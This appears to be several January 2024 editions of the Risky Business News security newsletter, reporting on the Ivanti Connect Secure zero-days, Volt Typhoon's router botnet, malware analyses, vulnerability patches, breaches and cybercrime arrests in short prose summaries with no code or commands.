Atomic Stealer: eSentire security researcher Russian Panda has analyzed AMOS, or Atomic Stealer, one of the first infostealers specifically created for macOS systems. Atomic is sold for the whopping price of $3,000/month, which makes it one of the most expensive malware strains offered today.
Pure malware family: ANY.RUN researchers have published a report on all the malware strains part of the Pure malware family. This includes PureMiner (cryptominer), PureLogs (infostealer), PureLogs Loader (loader), and PureCrypter (crypter, and probably the most known of the four).
DarkGate: South Korea security firm S2W Talon has published a report on DarkGate, one of today's most popular MaaS portals and malware loaders.
Androxgh0st: The FBI and CISA have published a report on Androxgh0st, a botnet malware specialized in attacking web and cloud infrastructure.
Sponsor Section
A short demo on how to use Panther's Detections-as-Code (DaC) platform for cryptominer investigations.
APTs, cyber-espionage, and info-ops
Connect Secure mass-exploitation:More than 1,700 Ivanti Connect Secure VPN appliances have been compromised using two recently disclosed zero-days. The devices were compromised by a Chinese state-sponsored group that has been using the zero-days since early December. According to security firm Volexity, the APT group ramped up operations on January 10 after Ivanti publicly warned customers of the two vulnerabilities. Patches for the two zero-days are expected on January 22. Several security researchers who've been tracking the attacks say that customers who did not apply Ivanti's temporary mitigations are most likely compromised already. More than 6,800 Connect Secure (formerly Pulse Secure) servers are currently exposed online and vulnerable to attacks.
Image: Shadowserver Foundation
Vulnerabilities, security research, and bug bounty
PAX POS vulnerabilities: STM Cyber has found six vulnerabilities in Android-based PAX POS devices. The company has published details on five of the six.
LeftoverLocals vulnerability: Security firm Trail of Bits has discovered a vulnerability that affects GPU cards from AMD, Apple, Qualcomm, and Imagination. Named LeftoverLocals, the vulnerability allows threat actors to memory isolation and recover data from other processes running on the same GPU. Trail of Bits says that while LeftoverLocals impacts the security posture of GPUs as a whole, the vulnerability is particularly dangerous for GPU platforms that run LLMs and ML models.
PixieFail vulnerabilities: French cybersecurity firm Quarkslab has identified nine vulnerabilities in EDK II, an open-source implementation of the UEFI standard. Codenamed PixieFail, the vulnerabilities reside in the EDK II network stack. Quarkslab says the bugs can be exploited by remote attackers during a computer's boot-up process to execute malicious code, poison DNS records, or hijack network sessions.
Opera MyFlow vulnerability: Security researchers have discovered a major vulnerability in MyFlow, a feature of the Opera browser that lets users sync files between devices. Attackers can abuse the feature to execute malicious files without user interaction on both Windows and macOS systems. Guardio Labs say Opera fixed the attack on November 22, but they are not releasing any proof-of-concept because of concern that Opera's existing browser architecture remains at high risk for exploitation.
Chrome zero-day: Google has released an update for its Chrome browser to fix an actively exploited zero-day tracked as CVE-2024-0519.
Citrix zero-days: Citrix has released security updates to patch two zero-days in NetScaler ADC and NetScaler Gateway appliances. Tracked as CVE-2023-6548 and CVE-2023-6549, the two are described as authenticated remote code execution and denial of service vulnerabilities. The company says it observed exploits for both CVEs against devices in the wild.
VMWare security update: Software vendor VMWare has published a security update to fix a missing access control vulnerability in its ARIA product line. The vulnerability (CVE-2023-34063) has a severity score of 9.9/10 and can allow unauthorized access to customer systems.
Atlassian security update: Atlassian has published a security update to patch 29 vulnerabilities across several of its products. The worst of these bugs is a template injection vulnerability that allows unauthenticated, remote attackers to run malicious code on Confluence servers. Tracked as CVE-2023-22527, the vulnerability received a rare 10/10 severity score. Atlassian says the bug impacts all Confluence servers part of its 8.x series released before December 5, 2023.
Infosec industry
New tool—KEV Detector: Security firm Ostorlab has released KEV Detector, a tool that automates the detection of known exploited vulnerabilities. It is sourced from CISA's KEV database but also Google Tsunami, Ostorlab's own Agent Asteroid, and some bug bounty programs.
New tool—SuperSharpShares: Security firm Lares has open-sourced a tool named SuperSharpShares that automates enumerating domain shares, allowing for quick verification of accessible shares in an associated domain.
New tool—iShutdown: Russian security firm Kaspersky has released iShutdown, a collection of Python scripts that can detect various strains of iOS spyware, such as Pegasus, Predator, and Reign.
Acquisition news: DevSecOps company Snyk has acquired AppSec runtime provider Helios.
Pwn2Own Vancouver 2024 program: The program for the spring version of Pwn2Own 2024 has been announced. Besides web browsers, virtualization software, servers, and enterprise software, this year, ZDI added a new cloud-native and container category. Slack has also been added to the target pool in the enterprise category. The cash prize pool is $1,000,000.
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq talk about how Stuxnet was an 'inevitability gamechanger,' how much we now know about the operation, and how much the Dutch government should have known at the time.
This newsletter is brought to you by Panther, the scalable detection-as-code based SIEM. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
A Chinese state-sponsored espionage group has compromised and is currently controlling roughly 30% of all Cisco RV320 and Cisco RV325 WAN routers across the internet.
Active infections were spotted by SecurityScorecard's STRIKE Team over the past 37 days, between December 1, 2023, and January 7, 2024.
The routers are infected with and are part of KV, a botnet first spotted by internet infrastructure company Lumen last month. According to Lumen, the same botnet also consists of a large number of DrayTek Vigor routers, NETGEAR ProSAFE firewalls, and Axis security cameras.
The botnet is operated by Chinese APT Volt Typhoon. The group is the infosec industry's current Chinese cyber-threat-du-jour. First exposed in May of 2023, the group has been linked to a covert Chinese effort to breach US critical communications infrastructure.
Reporting citing government sources claimed the group was doing the equivalent of "war pre-position" by planting its seeds in critical US infrastructure that could be exploited in the case of a possible military conflict in the Pacific to hinder the US' response in the region.
The initial Microsoft report that exposed Volt Typhoon operations noted that the group was using compromised SOHO devices to proxy and hide its command and control infrastructure from infected hosts and network defenders. The subsequent Lumen report confirmed this particular detail, and Lumen provided both more details and IOCs about Volt Typhoon proxy network—aka the KV botnet.
SecurityScorecard says it used the Lumen findings and internet netflow data to determine targets of Volt Typhoon attacks by looking at which networks the infected Cisco devices communicated once they got infected.
The company says it identified 27 IP addresses hosting a total of 69 US, UK, Australian, and Indian government sites.
While the report basically confirms for the first time that Volt Typhoon has targeted other countries besides the US, it is, honestly, not that surprising.
Breaches, hacks, and security incidents
Framework data breach: Laptop maker Framework says the data of an unknown number of customers was stolen after a security breach at its external accounting provider.
Hathway data leak: A hacker claims to have stolen the data of more than 41.5 million customers of Indian internet service provider Hathway. The hacker has leaked the data of 4.6 million users as proof of their claim. They have also set up a dark web portal where Hathway customers can check if they are affected by the breach. The ISP has yet to acknowledge the incident. [Additional coverage in RestorePrivacy]
General tech and privacy
HelloFresh fined for spamming: The UK's privacy watchdog has fined grocery delivery service HelloFresh £140,000 for sending marketing spam to UK customers. The ICO says HelloFresh sent more than 79 million spam emails and one million spam texts, even to customers who canceled their subscriptions.
eBay fined in 2019 harassment case: eBay has agreed to pay a $3 million fine to settle a DOJ lawsuit accusing the company of orchestrating a harassment and intimidation campaign. The company admitted that its security team harassed a US couple who ran a newsletter that negatively reviewed eBay products. eBay's former Senior Director of Safety and Security and six members of the company's security team posted negative comments on the newsletter's articles and a bunch of way way waaaaaaay more creepy stuff—see below.
"The campaign included sending anonymous and disturbing deliveries to the victims' home, including a book on surviving the death of a spouse, a bloody pig mask, a fetal pig and a funeral wreath and live insects; sending private Twitter messages and public tweets criticizing the newsletter’s content and threatening to visit the victims in Natick; and traveling to Natick to surveil the victims and install a GPS tracking device on their car. The harassment also featured Craigslist posts inviting the public for sexual encounters at the victims' home."
Users are less worth: A Raptive study estimates that the general value of a user's data is now worth 30% less after Google's migration from cookie-based tracking technology to its Privacy Sandbox system. [Additional coverage in Gizmodo]
YouTube sabotages ad block users (again): Instead of cleaning its scummy and scammy ad platform, YouTube is now slowing video buffers for users with an ad-blocker installed.
VMWare license drama: VMWare customers are reporting issues with renewing their licenses. [Additional coverage in BornCity]
"After the Broadcom takeover, absolute chaos reigns. Dealers have been terminated, orders via OEMs are sometimes impossible, and the end customer portal for license activation has been shut down."
Bitwarden adds passkeys: Password manager Bitwarden has added support for passkeys.
OpenSSH removes DSA: The OpenSSH project has announced plans to remove support for DSA keys. OpenSSH has disabled DSA keys by default since 2015 but has retained optional support. A full DSA removal is planned for January 2025.
ModSecurity moves to OWASP: Security firm Trustwave has transferred the stewardship of the ModSecurity open-source web application firewall (WAF) engine to the OWASP Foundation. The company is relinquishing control of the project after it was sold by SingTel to the MC2 Security Fund earlier this month. Trustwave has managed ModSecurity since 2010. The OWASP Foundation is a community-led project that manages several cybersecurity-focused initiatives and open-source projects.
Government, politics, and policy
FCC addresses domestic abuse: FCC Chairwoman Jessica Rosenworcel has sent letters to nine automakers and three mobile operators to seek their help in protecting victims of domestic abuse. The FCC Chair is reacting to multiple incidents of abusers tracking their victims using data from connected cars and mobile devices. The letter has asked companies to reveal what kind of data they collect from users and how domestic abuse survivors can be protected.
US federal cybersecurity education requirements: The Biden administration is working to remove the requirement for four-year degrees for some federal cybersecurity jobs. The upcoming change comes as part of the White House's efforts to boost hiring of cybersecurity professionals in federal agencies. Efforts to improve diversity in cybersecurity hiring are also underway, officials said. [Additional coverage in CyberScoop]
CDP analysis: The US Government and Accountability Office has looked at the activity of the Bureau of Cyberspace and Digital Policy (CDP), a bureau established by the State Department in April 2022 to tackle and promote cybersecurity policies at the foreign affairs and diplomacy level. The GAO gave the bureau a generally positive review. [Additional coverage in NextGov]
NFT scammer charged: US prosecutors have charged an active duty US Air Force cyber analyst for running an NFT scam named UndeadApes. [Additional coverage in Forbes]
Canada hires SecurityScorecard: The Canadian government has signed a partnership with security firm SecurityScorecard to provide security ratings for government and critical infrastructure resources as a way to assess their cybersecurity posture. [Additional coverage in the Vancouver Sun]
Swiss bulk collection scandal: Reporters from Swiss digital magazine Republik have published part one of a three-part series that covers how the Swiss intelligence services are abusing their powers for bulk data collection of all Swiss internet traffic, and not just cross-border communications. The report covers how Swiss intelligence services have ignored safeguards and protections and are now seeking to legalize their current practices and even expand their surveillance powers.
The Great Russian SIM Purge: Russian telecommunications watchdog Roskomnadzor has disabled more than 600,000 gray SIM cards. The agency says it sent notifications to more than 43 million SIM cards that did not have ownership details with mobile operators. SIM card owners had until the end of December to register their information with their operator. There are more than 351 million phone numbers registered in Russia. [Additional coverage in Vedomosti]
Sponsor section
In this Risky Business News sponsor interview Tom Uren talks to Ken Westin, Field CISO at Panther about how the rise of cloud and hybrid IT architectures requires a new type of SIEM.
Cybercrime and threat intel
Cryptominer arrested in Ukraine:Europol and Ukraine's Cyber Police detained a man from the city of Mykolaiv for running a crypto-mining botnet. The 29-year-old suspect used brute-force attacks to break into cloud providers and install crypto-mining malware. Officials say the suspect made over $2 million from the scheme.
Malware author detained in Belarus: Belarusian authorities have arrested a 35-year-old man from Voronovo on charges of developing malware. Authorities say the suspect sold the malware for $100 to customers in China and former Soviet states. The malware was described as a program designed to bypass protections and access account data on online sites.
Phisher sentenced in Russia: A Russian man from the city of Bryansk has been sentenced to one year in prison for launching phishing attacks against Russian government agencies. Officials say the suspect tried to collect login credentials for future attacks. He allegedly launched the attacks from his workplace. [Additional coverage in TASS]
Hacker detained in the Philippines: Philippine authorities have arrested a 47-year-old man on charges of allegedly targeting foreigners with illegal online activities. Named Edgar Silvano, the man previously served a prison sentence for hacking-related charges in the early 2000s, when he was also described as "Asia's best hacker." [Additional coverage in PhilStar, via DataBreaches.net]
Russian independent journalists targeted: A mysterious threat actor is targeting Russian independent journalists with spear-phishing attacks designed to collect their email login credentials. The attackers pose as fellow journalists from other Russian outlets and claim the target has stolen their article. Russian journalists working for Baza and the OCCRP confirmed to have been targeted. They warn fellow reporters to be extremely careful after several Kremlin critics lost their lives since Russia's invasion of Ukraine.
MSIX malware campaigns: Red Canary researchers have taken a look at all the recent malspam campaigns that are using MSIX files for the initial infection, a rising trend that has forced Microsoft to disable the ms-appinstaller (MSIX) protocol handler in Windows. However, as Red Canary points out, we're not out of the woods just yet.
"Microsoft chose to leave the protocol disabled by default, requiring a configuration change to enable it. As with previous encounters with MSIX files, this disabling solution does not fully eliminate the threat of MSIX files, it merely requires the malicious MSIX files to be intentionally downloaded to disk before execution."
Phishing attacks:Spotify and View Card users are currently being targeted with phishing emails.
New npm malware: Thirty-six malicious npm packages were discovered last week. Check out GitHub's security advisory portal for more details.
Solana wallet drainers: ScamSniffer researchers have tracked a group that has stolen nearly $4.17 million in crypto assets from about 4,000 Solana users. The campaign used Twitter replies that lured users to phishing sites that drained their Solana funds and NFTs. The campaign is the latest in a recent trend where cybercrime groups are using phishing kits specialized in automatically draining compromised crypto-wallets. These kits are known as "wallet drainers."
Growth in malicious botnets: Network security company Netscout has seen a spike in malicious botnets performing reconnaissance scanning operations. The company says it observed tens of thousands of devices performing malicious scans in December 2023. Peaks varied from 35,000 to 143,000 daily distinct scanning devices. The number is well above the 10,000 daily average the company saw last year.
Malware technical reports
Phemedrone Stealer: Trend Micro looks at Phemedrone Stealer, a new infostealer currently distributed in the wild with the help of a Windows SmartScreen bypass (CVE-2023-36025).
Shiz: Chinese security firm Tinder Security has published a report on Shiz, an infostealer and browser hijacker.
WorkersDevBackdoor: eSentire has analyzed a malvertising campaign from November 2023 that deployed the WorkersDevBackdoor on infected hosts.
Rimasuta: QiAnXin researchers have analyzed recent changes in Rimasuta, one of the many Mirai malware variants out there in the wild. This particular strain has been in the wild since June 2021 and is also known as Mirai_ptea.
Hunters International: Broadcom has published a summary analysis of Hunters International, a dual-extortion ransomware operation.
Sponsor Section
A short demo on how to use Panther's Detections-as-Code (DaC) platform for cryptominer investigations.
APTs, cyber-espionage, and info-ops
Volexity attacks: Mandiant has published its own report on the recently disclosed Ivanti zero-days. See Volexity's report here. Mandiant says it tracks the attacking group as UNC5221. Volexity's name for the group is UTA0178.
APT28's OceanMap: Malware researcher Niraj S. has published an analysis of OceanMap, a backdoor strain operated by the APT28 Russian cyber-espionage group.
Vulnerabilities, security research, and bug bounty
Juniper security updates: American networking equipment vendor Juniper has released threesecurityupdates for its switchers and firewall devices. The worst of the three is a pre-auth RCE (CVE-2024-21591) in the devices' web panel. Juniper has released firmware patches and has recommended that customers disable the J-Web interface until patches are applied. The vulnerability is very likely to be exploited in the wild. According to Censys, there are more than 11,500 Juniper devices with J-Web enabled on the internet.
GitLab security updates: Code management platform GitLab has released a security update to address five vulnerabilities. The most critical issue is a bug tracked as CVE-2023-7028 that can allow threat actors to take over accounts using the platform's password reset feature. User accounts with 2FA enabled are not vulnerable to this attack. The proof-of-concept is apparently ridiculously simple.
Apple keyboard fixes: Apple has fixed a hijack vulnerability in its Bluetooth keyboards discovered by Skysafe security researcher Marc Newlin last year. Android fixes were released in December.
PaperCut WebDAV RCE: Horizon3 has published a technical deep-dive into a PaperCut WebDAV vulnerability (CVE-2023-39143) it found last year and can be used for RCE scenarios. The vulnerability was patched last July.
NextGen Mirth Connect RCE: The same Horizon3 also published a technical deep-dive into a pre-auth RCE (CVE-2023-43208) it found in NextGen Mirth Connect, an open-source healthcare data integration platform. This one was patched last October.
XAML Diagnostics bug: Island's Michael Maltsev has published more details on CVE-2023-36003, an EoP vulnerability in XAML Diagnostics, a library used by several Microsoft system utilities.
Ivanti zero-days: watchTowr Labs researchers claim they were able to create PoCs for the two recently disclosed Ivanti Pulse Secure zero-days in less than 48 hours after their disclosure. It's not the first of such claims, and several PoCs appear to have already been created, although none were publicly released at the time of writing.
LATAM app vulnerabilities: CitizenLab and the Open Technology Fund have published a joint report containing details about vulnerabilities in several mobile apps used across Latin America.
Infosec industry
BSides Berlin 2023 videos: Talks from the BSides Berlin 2023 security conference, which took place in November 2023, are now available on YouTube.
Last Shmoocon: The organizers of the Shmoocon security conference have announced that next year's edition (2025) will be the conference's last one.
Industry moves: Brad Arkin has joined Salesforce as the company's new Chief Trust Officer. Arkin served as Cisco's Chief Security and Trust Officer from March 2020 to December 2023. He previously served as Adobe's Chief Security Officer for seven years. [Additional coverage in SecurityWeek]
Free security help for NGOs: The CyberPeace Institute has published a rundown of all the cyberattacks that targeted its staff and operations over the past two years. The organization says it will offer free cybersecurity assistance and expertise to any other NGO that needs such help.
Ghost jobs: Something we missed from last August was this study from StandoutCV that found that almost half of the job listings for cybersecurity analysts in the UK were "ghost jobs."
"They’re used by employers to build a candidate pool, make the company look like it’s actively hiring (therefore growing), or are left by recruiters who simply forget to take them down."
New tool—Canary Token Scanner: The NeroTeam Security Labs (or NSLabs) has released Canary Token Scanner, a script designed to proactively identify Canary Tokens within Microsoft Office documents (docx, xlsx, pptx).
New tool—Talkback: Security firm Elttam has published a technical explanation (I guess it's a formal launch) of how its Talkback infosec aggregator works.
New tool—Exploit Observer: Security firm A.R.P. Syndicate has launched Exploit Observer, a free API that returns information about exploits available for a certain technology or vulnerability.
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq talk with infosec and anti-virus veteran Martijn Grooten about how the infosec industry has changed over the years.
This newsletter is brought to you by Stairwell. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
A Chinese state-sponsored hacking group has exploited two zero-days in Ivanti Connect Secure VPN appliances (formerly known as Pulse Secure) to gain access to corporate networks.
The zero-days were discovered by American cybersecurity firm Volexity, which attributed the attacks to a group it tracks as UTA0178.
Ivanti has published mitigations and workarounds that customers can apply until firmware patches are released on January 22.
The two zero-days are an authentication bypass (CVE-2023-46805) and a command injection vulnerability (CVE-2024-21887) that can be chained together to run malicious code on remote Pulse Secure devices.
UTA0178 abused the zero-days primarily as an initial entry vector. After gaining access to Pulse Secure appliances, the attackers installed JavaScript keyloggers that collected user credentials, which they later used to move inside internal networks.
Once inside, UTA0178 installed a new web shell named GLASSTOKEN on internal servers and externally facing devices.
Operators then used a network of hacked Sophos Cyberoam firewalls as proxies and connected to the web shells in order to disguise their real location and collect data from compromised victims.
Volexity says it traced UTA0178 attacks as early as December 3, 2023.
Ivanti says it is "aware of less than 10 customers impacted by the vulnerabilities."
The security firm has published a list of IOCs from the incidents it investigated. It urged Pulse Secure customers to use the IOCs to scan for possible compromises of their internal networks.
Both Volexity and Ivanti warn that applying firmware patches will only prevent future exploitation with the two zero-days but will not remove UAT0178 from already compromised networks. Organizations with Pulse Secure devices will have to scan networks and remove the attacker's web shells on their own.
"The anticipated wait time for a patch is several weeks – some product users will have to wait until February for a patch," Satnam Narang, senior staff research engineer at Tenable, told Risky Business.
"As soon as a proof of concept is available for this exploit chain, we expect malicious activity to spike, especially based on historical activity targeting these products."
More than 16,000 Ivanti Pulse Secure appliances will need patches in the coming weeks. Scans to identify Pulse Secure devices have already begun, according to Rapid7.
Apparently, the two zero-days have been collectively nicknamed "ConnectAround."
Breaches, hacks, and security incidents
Chattr.ai leak: AI hiring tool Chattr left its Firebase database exposed on the internet and leaked its customers' information, two security researchers havefound. The company's AI hiring tool is primarily used in the US fast food industry. Its customers include some of the world's largest companies, such as McDonalds, KFC, Taco Bell, Target, Applebees, Arby's, and Subway. The database exposed information on job applicants, franchise managers, and Chattr employees alike.
Maldives attacks: An Indian hacktivist group named TeaM NETWORK9 has defaced multiple Maldives government websites in a series of attacks this week. The attacks came after three local politicians made inappropriate public remarks about Indian Prime Minister Narendra Modi after he urged Indians to vacation in India's own Lakshadweep Islands instead of the Maldives. The Maldives government has since apologized for the statements. [Additional coverage in The Week]
Taiwan cyberattacks: Taiwanese organizations are seeing a flood of cyberattacks and espionage operations ahead of the country's election this weekend. [Additional coverage in Politico]
SEC Twitter account hack: A threat actor has hijacked the Twitter account of the US Securities and Exchange Commission and published a tweet claiming the agency had approved the trade of exchange-traded funds (EFTs). The incident is the latest in a long list of similar hacks of official Twitter accounts. Previous hacks have also hit companies like Mandiant, Hyundai, Netgear, CertiK, CoinGecko, and Bloomberg Crypto. Security firm CloudSEK previously reported about the rise of a new marketplace advertising access to compromised Twitter "gold" business accounts. [Additional coverage in TechCrunch]
General tech and privacy
Fortnite refunds deadline extended: The FTC has extended the deadline for parents to submit claims and receive compensation from Epic Games. The game maker agreed last year to pay $245 million to parents whose kids were tricked into making unwanted purchases in the company's Fortnite game. The FTC notified parents via email in September 2023, and parents could have filed claims until January 17 this year. The new deadline is February 29.
FTC bans data broker: The FTC has banned data broker Outlogic (formerly X-Mode Social) from selling precise location data of American citizens. The agency says the sale of such data violates consumers' rights to privacy. The FTC says past X-Mode/Outlogic location data was used to expose visits to sensitive locations such as medical clinics, places of religious worship, and domestic abuse shelters. The agency argued that such data could be used to expose consumers to potential discrimination, physical violence, emotional distress, and other harms. Outlogic becomes the first US data broker to receive this type of ban.
Twitter bans: The "fReE sPeEcH" absolutists at Twitter have banned a large number of accounts for prominent journalists and left-wing political commentators. [Additional coverage in Vice]
Twitter slashes trust and safety team: Twitter has fired a third of its trust and safety team since Musk's acquisition, according to Australia’s online safety watchdog.
Meta GDPR complaint: EU privacy-focused foundation Noyb has filed a GDPR complaint against American social media company Meta. The complaint claims Meta ignores EU users' right to withdraw their consent to be tracked online. Noyb says users of Meta services can't withdraw their consent unless they become paid Meta users, which costs €250/year. The complaint was filed in Austria.
Microsoft EU Data Boundary: Microsoft has announced the EU Data Boundary, a new feature that will let EU organizations store customer data on EU servers only. The new feature will be available for the company's Azure, Microsoft 365, Power Platform, and Dynamics 365 services. Microsoft says some data may be transferred to its US infrastructure for crucial cybersecurity functions, but such transfers will be documented.
Iran's Wikipedia campaign: Pro-Iranian editors are conducting a campaign to alter or delete Wikipedia pages describing its human rights and other abuses. Massive edits were made to Wikipedia's Persian pages, with recent edits now also being made on the English version. The modifications or page deletions were spotted on articles about mass killings, assassinations, and dissidents. The edits were spotted by a Wikipedia editor who shared his findings with journalists after the site failed to take action. [Additional coverage in The Australian]
Government, politics, and policy
New Russian legislation: The Russian government is working on a law draft that will force any website that allows users to "exchange messages" to register with the Roskomnadzor, the country's internet watchdog. Websites that fail do so may be fined or blocked inside RuNet, Russia's internal internet. [Additional coverage in Kommersant]
US cybersecurity requirements for hospitals: The White House will unveil new cybersecurity requirements for US hospitals in the upcoming months. The new rules will require hospitals to establish basic cybersecurity defenses in order to receive federal funding. The US government is pushing the new requirements in the aftermath of a wave of incidents that has crippled hundreds of hospitals across the US over the past year. The US hospital industry previously vowed to fight any new rulemaking. [Additional coverage in The Messenger]
Sponsor section
In this Risky Business News sponsor interview, Tom Uren talks to Chris St Myers, Stairwell's head of threat research, about managing the risk from software you absolutely must use.
Cybercrime and threat intel
ShinyHunters member sentenced: A US judge has sentenced a French hacker to three years in prison for hacking, wire fraud, and identity theft charges. Sebastien Raoult was a member of the ShinyHunters group, where he operated under the Sezyo Kaizen nickname. He pleaded guilty to hacking and selling the data of more than 60 companies on underground hacking forums. As part of the sentence, Raoult will also have to pay $5 million in restitution for his crimes. [h/t Gabriel Thierry]
CLINKSINK campaign: Mandiant has published details on CLINKSINK, a campaign that uses scams posted on hacked Twitter accounts to lure users to a crypto-drainer phishing kit and steal user's cryptocurrency funds. This is the same campaign that posted a scam on Mandiant's Twitter account at the start of the year.
OPAU (OpAustralia): On December 22, several Indonesian hacktivist groups launched OPAU (OpAustralia), a campaign of attacks against Australian organizations. The reason for the campaign is just as stupid as you think it is—because most hacktivist campaigns are stupid like this.
"The trigger for this campaign was an article from 25 April 2023 that reported on the KKB, who has conducted attacks on the Indonesian military in West Papua. Within the article, it's reported that the KKB has asked Australia for weapons. (The Australian government has not provided any weapons to the group)."
Akira attacks: Finland's cybersecurity agency has published threesecurityalerts over the past weeks warning local organizations about an increase in attacks from the Akira ransomware group. The agency says the intrusions typically occurred after the gang exploited vulnerabilities in Cisco ASA and FTD devices. NCSC-FI says that in several cases, the attackers also wiped NAS and tape backups before encrypting files.
Jenkins brute-force campaign: Jenkins servers are currently seeing some brute-force attacks, per SANS ISC.
Apache exploitation: A threat actor is exploiting Apache Hadoop and Flink servers to deploy rootkits and cryptominers. The attacks have taken place over the past weeks, and the same threat actor previously also targeted Redis and Spring servers as well.
SharePoint exploitation:CISA says that threat actors are exploiting a vulnerability in Microsoft SharePoint servers. Tracked as CVE-2023-29357, the bug was patched in June of last year. The vulnerability is an elevation of privilege that can be chained with other SharePoint bugs to achieve remote code execution attacks. Technical write-ups and public PoCs on how to perform such attacks have been available online since September of last year [1, 2, 3, 4, 5, 6].
Hacked WordPress sites: More than 6,700 WordPress sites have been hacked and compromised with the Balada Injector backdoor. The sites were hacked using a vulnerability (CVE-2023-6000) in the Popup Builder plugin disclosed at the start of December. Balada Injector is a malware campaign that has been active for years. Its primary role is to redirect visitors of the hacked sites to tech support scams.
Abuse of GitHub services: Recorded Future looks at how malware authors are abusing GitHub's services to host and disguise malicious content.
C&C frameworks: Open-source tools like Cobalt Strike, Meterpreter, and Viper have been the most popular command-and-control (C&C) frameworks with malware authors in 2023. The three were by far the most popular frameworks among malware authors, followed at a large distance by tools like Sliver, Havoc, and Brute Ratel. The biggest change is Viper, which is now just as popular as Meterpreter, according to data collected by Recorded Future.
Malware technical reports
Medusa ransomware: Palo Alto Networks has published an analysis of the Medusa ransomware operation, a dual-extortion group that launched in 2023.
Atomic Stealer: Malwarebytes has found a new version of Atomic Stealer, a macOS information stealer that was first spotted last year.
FBot: SentinelOne looks at FBot, a hacking tool used by multiple threat actors to hijack cloud infrastructure, web servers, and SaaS services.
DreamBus: Zscalers researchers look at DreamBus, a Linux-based botnet that has been active since 2019. Researchers say that over the past six months, the botnet has seen a resurgence after launching attacks against Metabase and Apache RocketMQ servers. The final payload is still a Monero miner, as before.
Aquabot: Antiy researchers have published a technical report on Aquabot, another Mirai variant spotted recently in the wild.
NoaBot: Akamai researchers have uncovered a new malware botnet named NoaBot that has been seen infecting servers across the world. NoaBot is built on top of the Mirai SSH self-spreading worm but drops a cryptocurrency miner on infected systems. Akamai says the botnet has been silently expanding since January of 2023 and appears to be connected to the P2PInfect botnet that targets Redis databases, also for cryptomining.
Sponsor Section
Stairwell's Mike Wiacek demonstrates Stairwell's file analysis and threat detection platform to Risky Business host Patrick Gray. Stairwell helps you monitor and analyze every executable file in your organization, automatically collecting crucial intelligence and providing your security team with in-depth visibility and detections.
APTs, cyber-espionage, and info-ops
Sticky Werewolf: The Sticky Werewolf APT group launched a spear-phishing operation on January 2 and 3 that targeted Russian telecommunications providers, according to Russian cybersecurity firm FACCT.
UAC-0050: Ukraine's CERT team has new details on the never-ending UAC-0050 spear-phishing campaigns targeting Ukraine.
Sandworm: Forescout has a deep dive [PDF] into the Sandworm attacks against Denmark's critical sector that were spotted last year by local authorities. The surprising main conclusion is below.
"Evidence suggests that the two waves of attacks on Danish infrastructure reported by SektorCERT were unrelated. It also suggests that the second wave was simply part of a mass exploitation campaign against unpatched firewalls, not part of a targeted attack by Sandworm or another state-sponsored actor."
Vulnerabilities, security research, and bug bounty
ColdFusion zero-day write-up: SecureLayer7 has published a technical deep dive of CVE-2023-26360, an Adobe ColdFusion zero-day exploited in the wild that was patched in March 2023.
OFBiz exploitation: Security firm VulnCheck says that of the 10,000 Apache OFBiz servers exposed online, only ~1,000 are vulnerable to a recent zero-day (CVE-2023-51467).
Cisco security updates: Cisco has released or updated seven security advisories for various products.
Unfixed Linux RCE/DOS: A Linux vulnerability tracked as CVE-2023-6270, which can lead to DOS and RCE scenarios, has been sitting unfixed in the Linux kernel for more than 100 days, per Brad Spengler from Grsecurity.
Bosch thermostat firmware rewriting: Bitdefender researchers have found a vulnerability (CVE-2023-49722) in Bosch BCC100 thermostats that can be used to rewrite a device's firmware from the local LAN.
Infosec industry
New tool—ContainerCVE: Software engineer Amir Boroumand has launched a tool named ContainerCVE that scans Docker Hub images for known vulnerabilities.
New tool—Secator: French security firm FreeLabz has released Secator, a task and workflow runner that can be used for cybersecurity assessments.
Tool update—RansomLord:Version 2 of the RansomLord anti-ransomware tool is now out.
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq talk with infosec and anti-virus veteran Martijn Grooten about how the infosec industry has changed over the years.
This newsletter is brought to you by Stairwell. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
A ransomware attack has wreaked havoc inside the network of Tigo, the largest mobile operator and internet service provider in Paraguay.
The incident took place last Thursday, January 4, and impacted the telco's business branch.
Around 300 servers in Tigo's data center were encrypted, according to Miguel Ángel Gaspar, director of the Paraguay Ciberseguro Foundation.
At least 300 companies were impacted downstream. The companies lost phone service and files hosted on Tigo servers.
Some government organizations are believed to have been impacted. The Paraguayan Army's cybersecurity team has urged public and private sector institutions to take steps to harden their networks in the incident's aftermath.
The Tigo attack has been attributed by local media to a ransomware group named BlackHunt. According to Fortinet, the BlackHunt group emerged at the end of 2022 and is known to breach victims via unsecured RDP connections.
Image: Fortinet
Besides encrypting data, the group is also known to steal files for secondary extortion attempts, although it does not operate a dark web data leak site like other ransomware crews.
According to a local radio station, Tigo has not contacted the group to negotiate a ransom.
The company put out a statement calling all reports on its incident "fake news," which, in turn, led to the company being ridiculed on social media and with some customers announcing plans to switch to another provider.
Breaches, hacks, and security incidents
Bit24 leak: Iranian cryptocurrency exchange Bit23.cash has leaked the personal information of more than 230,000 customers. The data leaked via an unsecured MinIO server that exposed the platform's AWS credentials. The exposed data included photos of passports, IDs, and credit cards, which customers uploaded on the site during the KYC process. [Additional coverage in Cybernews]
Inspiring Vacations leak: Australian travel agency Inspiring Vacations has leaked customer data after leaving one of its databases exposed on the internet without a password. The database leaked 26.8GB of data, containing more than 112,000 records, such as high-resolution passport images, travel visas, and itinerary tickets. [Additional coverage in The Age] [h/t Scrantic]
LoanDepot cyberattack: American mortgage provider LoanDepot has taken some of its IT infrastructure offline in the aftermath of a ransomware attack. The company is the fourth major US mortgage and real estate insurance provider that was hit by a cyberattack over the past months. Similar incidents have also affected Mr. Cooper, Fidelity National Financial, and First American Financial.
WCC cyberattack: The World Council of Churches got hit by a cybersecurity incident over the Christmas holiday. The incident is believed to be a ransomware attack, possibly carried out by the Rhysida gang. [Additional coverage in The Record]
Ukraine repels attack on state payment system: Ukraine says it repelled Russian cyberattacks against its state payment system for the second week in a row. Officials say Russian hackers tried to destroy vital systems used for budget payments. The operation comes after Russian hackers successfully wiped servers inside Kyivstar, the country's largest mobile operator.
